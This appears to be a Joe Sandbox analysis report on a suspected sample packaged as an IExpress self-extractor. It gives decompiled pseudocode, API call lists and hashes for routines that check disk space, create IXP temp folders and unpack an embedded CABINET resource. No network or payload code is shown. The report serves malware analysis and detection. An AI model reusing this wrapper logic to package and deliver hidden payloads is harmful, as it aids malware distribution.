Part of subcall function 00CE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
Part of subcall function 00CE44B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554

Part of subcall function 00CE6285: GetLastError.KERNEL32(00CE5BBC), ref: 00CE6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00CE56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00CE571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00CE5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00CE57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00CE57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00CE5802

Part of subcall function 00CE2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00CE2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00CE5830

Part of subcall function 00CE6517: FindResourceA.KERNEL32(00CE0000,000007D6,00000005), ref: 00CE652A
Part of subcall function 00CE6517: LoadResource.KERNEL32(00CE0000,00000000,?,?,00CE2EE8,00000000,00CE19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00CE6538
Part of subcall function 00CE6517: DialogBoxIndirectParamA.USER32(00CE0000,00000000,00000547,00CE19E0,00000000), ref: 00CE6557
Part of subcall function 00CE6517: FreeResource.KERNEL32(00000000,?,?,00CE2EE8,00000000,00CE19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00CE6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00CE5878

Part of subcall function 00CE597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00CE59A8
Part of subcall function 00CE597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00CE59AF

Strings

msdownld.tmp, xrefs: 00CE57D3
Z, xrefs: 00CE570A
A:\, xrefs: 00CE56F4
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE56AE, 00CE56B3, 00CE583D
<None>, xrefs: 00CE5632
RUNPROGRAM, xrefs: 00CE55BD, 00CE5600

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-3498133043
Opcode ID: 2c02b2595d9593e10c2152874b1d7bfd7cdb192ce11a22d161e50d385cc91130
Instruction ID: c44859958cb92de4d91e167453538ca3576cb72e1b25282d07f1769ecbe832b5
Opcode Fuzzy Hash: 2c02b2595d9593e10c2152874b1d7bfd7cdb192ce11a22d161e50d385cc91130
Instruction Fuzzy Hash: EC8138B0A04AC49BDB34AB338C85BEE766D9F60348F0400A5F996D61D1EFB48FC18A51

Uniqueness

Uniqueness Score: -1.00%

Function 00CE597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00CE597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xce8004; // 0xd1db73d
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xce9124 = E00CE6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00CE44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xce9a34 & 0x00000008;
							if(( *0xce9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xce9a38; // 0x0
								_t110 =  *((intOrPtr*)(0xce89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xce9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E00CE268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xce9a38; // 0x0
							_t110 =  *((intOrPtr*)(0xce89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xce89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xce9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00CE44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xce9124 = E00CE6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E00CE44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xce9124 = E00CE6285();
					_t66 = 0;
					L33:
					return E00CE6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x00ce597d
0x00ce5988
0x00ce598f
0x00ce599a
0x00ce59a6
0x00ce59a8
0x00ce59af
0x00ce59b9
0x00ce59dd
0x00ce59e4
0x00ce59f1
0x00ce59fe
0x00ce5a0b
0x00ce5a13
0x00ce5a19
0x00ce5a1b
0x00ce5ba1
0x00ce5baf
0x00ce5bbd
0x00ce5bd8
0x00ce5bde
0x00ce5be3
0x00ce5bec
0x00ce5bf0
0x00ce5bfc
0x00ce5c02
0x00ce5c02
0x00ce5c02
0x00ce5c04
0x00ce5c04
0x00000000
0x00ce5c04
0x00ce5a27
0x00ce5a3a
0x00ce5a46
0x00ce5a48
0x00ce5a4a
0x00000000
0x00000000
0x00ce5a64
0x00ce5a6a
0x00ce5a6c
0x00ce5abc
0x00ce5ac2
0x00ce5ac9
0x00ce5aca
0x00ce5aca
0x00ce5acc
0x00ce5acc
0x00ce5acf
0x00ce5ad1
0x00000000
0x00000000
0x00ce5ad3
0x00ce5ad6
0x00ce5ad8
0x00000000
0x00000000
0x00ce5ada
0x00ce5adc
0x00ce5add
0x00ce5add
0x00ce5ae0
0x00000000
0x00000000
0x00000000
0x00ce5ae0
0x00ce5ae2
0x00ce5ae4
0x00ce5ae6
0x00ce5ae6
0x00ce5ae6
0x00ce5ae9
0x00ce5aeb
0x00ce5af0
0x00ce5af6
0x00ce5af8
0x00ce5af9
0x00ce5af9
0x00ce5afb
0x00000000
0x00000000
0x00ce5afd
0x00ce5aff
0x00ce5b00
0x00ce5b03
0x00000000
0x00000000
0x00000000
0x00ce5b03
0x00ce5b05
0x00ce5b08
0x00ce5b20
0x00ce5b27
0x00ce5b52
0x00ce5b52
0x00ce5b5b
0x00ce5b62
0x00ce5b6b
0x00ce5b6d
0x00ce5b76
0x00ce5b7d
0x00ce5b83
0x00ce5b7f
0x00ce5b7f
0x00ce5b7f
0x00ce5b6f
0x00ce5b72
0x00ce5b72
0x00ce5b85
0x00ce5b98
0x00ce5b9e
0x00ce5b87
0x00ce5b8f
0x00ce5b8f
0x00000000
0x00ce5b85
0x00ce5b29
0x00ce5b33
0x00000000
0x00000000
0x00ce5b35
0x00ce5b48
0x00ce5b4a
0x00000000
0x00ce5b4a
0x00ce5b0f
0x00ce5b16
0x00000000
0x00ce5b16
0x00ce5a7c
0x00ce5a8a
0x00ce5aa5
0x00ce5aab
0x00000000
0x00ce59bb
0x00ce59c0
0x00ce59c7
0x00ce59d1
0x00ce59d6
0x00ce5c05
0x00ce5c14
0x00ce5c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00CE59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 00CE59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00CE5A13
MulDiv.KERNEL32(?,?,00000400), ref: 00CE5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CE5A64
memset.MSVCRT ref: 00CE5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00CE5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00CE5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00CE5BFC

Part of subcall function 00CE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
Part of subcall function 00CE44B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554

Part of subcall function 00CE6285: GetLastError.KERNEL32(00CE5BBC), ref: 00CE6285

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: af83800798f1bf131fcb72e271fe7911d0a7db78413ae3938656305b735817fd
Instruction ID: d00c62a4fd3599d158c0f435b4dd7ffd8213fc57b18e5ee8dd56877a4ae004ee
Opcode Fuzzy Hash: af83800798f1bf131fcb72e271fe7911d0a7db78413ae3938656305b735817fd
Instruction Fuzzy Hash: 5D7181B1A0028CAFEB25DB61CCC5BFF77BDEB48344F1441A9F50696281DA349F859B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00CE4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0xce9144 = E00CE468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0xce9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0xce8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0xce8584, 0x841), 5);
				}
				_t10 = E00CE4EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00CE4CA0, E00CE4CC0, E00CE4980, E00CE4A50, E00CE4AD0, E00CE4B60, E00CE4BC0, 1, 0xce9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0xce9148; // 0x0
						_t24 =  *0xce8584; // 0x0
						E00CE44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0xce1140, 0, E00CE4CD0, 0, 0xce9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0xce8584; // 0x0
					E00CE44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0xce9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0xce9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0xce91d8; // 0x0
						if(_t47 == 0) {
							E00CE44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0xce8a38 & 0x00000001) == 0 && ( *0xce9a34 & 0x00000001) == 0) {
						SendMessageA( *0xce8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00ce4fe0
0x00ce4fe6
0x00ce4ff9
0x00ce500d
0x00ce5013
0x00ce501a
0x00ce5163
0x00ce5163
0x00ce5020
0x00ce5027
0x00ce5037
0x00ce5051
0x00ce5051
0x00ce5057
0x00ce505e
0x00ce50a7
0x00ce50ad
0x00ce50b4
0x00ce50e8
0x00ce50e8
0x00ce50ee
0x00ce50ff
0x00ce5104
0x00ce5106
0x00000000
0x00ce5106
0x00ce50cd
0x00ce50d3
0x00ce50da
0x00000000
0x00000000
0x00ce50dd
0x00ce50e6
0x00000000
0x00000000
0x00000000
0x00ce5060
0x00ce5060
0x00ce5070
0x00ce5075
0x00ce5107
0x00ce5107
0x00ce510e
0x00ce5111
0x00ce5117
0x00ce5117
0x00ce511f
0x00ce5121
0x00ce5127
0x00ce5135
0x00ce5135
0x00ce5127
0x00ce5141
0x00ce5159
0x00ce5159
0x00000000
0x00ce515f

APIs

Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46A0
Part of subcall function 00CE468F: SizeofResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46A9
Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46C3
Part of subcall function 00CE468F: LoadResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46CC
Part of subcall function 00CE468F: LockResource.KERNEL32(00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46D3
Part of subcall function 00CE468F: memcpy_s.MSVCRT ref: 00CE46E5
Part of subcall function 00CE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00CE4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00CE5006
LockResource.KERNEL32(00000000), ref: 00CE500D
GetDlgItem.USER32(00000000,00000842), ref: 00CE5030
ShowWindow.USER32(00000000), ref: 00CE5037
GetDlgItem.USER32(00000841,00000005), ref: 00CE504A
ShowWindow.USER32(00000000), ref: 00CE5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00CE5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00CE5159

Strings

*MEMCAB, xrefs: 00CE50C7
CABINET, xrefs: 00CE4FE6, 00CE4FF7

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: e01b3e3d58861059fbfaaf61695356ab8dff9b2486fde1adc12f8789fa7ea4c1
Instruction ID: 2329769bc742c46ad019c6a8d73f77419ddfed10f2b7a349b83b7627d7d1a741
Opcode Fuzzy Hash: e01b3e3d58861059fbfaaf61695356ab8dff9b2486fde1adc12f8789fa7ea4c1
Instruction Fuzzy Hash: CB31A7B17407C1BFE7245B63ADCAF6F365CF748759F040034F906AA2E1DAB99C409661

Uniqueness

Uniqueness Score: -1.00%

Function 00CE53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00CE53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0xce8004; // 0xd1db73d
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E00CE171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00CE1680(_t32, 0x104, _t20);
					E00CE658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00CE6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0xce8a20 = 1;
				goto L5;
			}

0x00ce53ac
0x00ce53b3
0x00ce53b9
0x00ce53bb
0x00ce53bd
0x00ce53bf
0x00ce53d1
0x00ce53d6
0x00ce53e0
0x00ce53e2
0x00ce53f5
0x00ce53fb
0x00ce5402
0x00ce540b
0x00000000
0x00000000
0x00ce5413
0x00000000
0x00000000
0x00ce5415
0x00ce5416
0x00ce5427
0x00ce542a
0x00ce542b
0x00ce5434
0x00ce5434
0x00ce543a
0x00ce544c
0x00ce544c
0x00ce5452
0x00ce545a
0x00000000
0x00000000
0x00ce545e
0x00ce545f
0x00000000

APIs

Part of subcall function 00CE171E: _vsnprintf.MSVCRT ref: 00CE1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE5452

Strings

IXP, xrefs: 00CE5419
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE53B7, 00CE53E1, 00CE541E
IXP%03d.TMP, xrefs: 00CE53C0

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2310010875
Opcode ID: 261af2d049597103015668bf1d6f78f4e725af8509a178770acdbab7254df7aa
Instruction ID: 2122814aee6b02fdf2ce102c105b44ad2e199bc094cc93e9ad8e6963d8530015
Opcode Fuzzy Hash: 261af2d049597103015668bf1d6f78f4e725af8509a178770acdbab7254df7aa
Instruction Fuzzy Hash: 1B1127727006846BD320AB379C89FAF3A6DEFC1725F000025F557D61D0CE749E8686A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00CE5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0xce8004; // 0xd1db73d
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0xce91e4;
					_t42 = 0x104;
					E00CE1680(0xce91e4, 0x104);
					L14:
					_t13 = E00CE58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0xce9124 = 0;
							_t14 = 1;
							L24:
							return E00CE6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E00CE597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0xce8a20; // 0x0
						if(_t61 != 0) {
							 *0xce8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0xce9124 = E00CE6285();
						goto L22;
					}
					 *0xce8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E00CE53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0xce91e4;
				E00CE1781(0xce91e4, 0x104, __ecx,  &_v268);
				if(( *0xce9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E00CE658A(_t48, 0x104, 0xce1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E00CE658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x00ce5472
0x00ce5479
0x00ce5481
0x00ce5484
0x00ce551c
0x00ce5521
0x00ce5528
0x00ce552d
0x00ce552f
0x00ce5539
0x00ce554d
0x00ce554d
0x00ce5552
0x00ce5585
0x00ce5585
0x00ce558b
0x00ce558d
0x00ce559d
0x00ce559d
0x00ce5557
0x00ce555e
0x00000000
0x00000000
0x00ce5560
0x00ce5566
0x00ce5569
0x00ce556f
0x00ce556f
0x00ce5581
0x00ce5581
0x00000000
0x00ce5581
0x00ce5545
0x00ce557c
0x00000000
0x00ce557c
0x00ce5547
0x00000000
0x00ce5547
0x00ce548a
0x00ce5490
0x00ce5497
0x00000000
0x00000000
0x00ce549d
0x00ce54ab
0x00ce54b4
0x00ce54c0
0x00ce550c
0x00ce5511
0x00ce5515
0x00000000
0x00ce5515
0x00ce54c9
0x00ce54d6
0x00ce54d8
0x00ce54fe
0x00ce5503
0x00ce5507
0x00000000
0x00ce5507
0x00ce54da
0x00ce54dd
0x00ce54f7
0x00000000
0x00ce54f7
0x00ce54df
0x00ce54e2
0x00ce54f0
0x00000000
0x00ce54f0
0x00ce54e7
0x00000000
0x00000000
0x00ce54e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE556F

Part of subcall function 00CE53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE53FB
Part of subcall function 00CE53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE5402
Part of subcall function 00CE53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE541F
Part of subcall function 00CE53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE542B
Part of subcall function 00CE53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00CE5434

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE547D, 00CE5481, 00CE54AB, 00CE551C, 00CE553C, 00CE5568
i386, xrefs: 00CE54FE
alpha, xrefs: 00CE54F0
mips, xrefs: 00CE54F7
ppc, xrefs: 00CE54E9

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

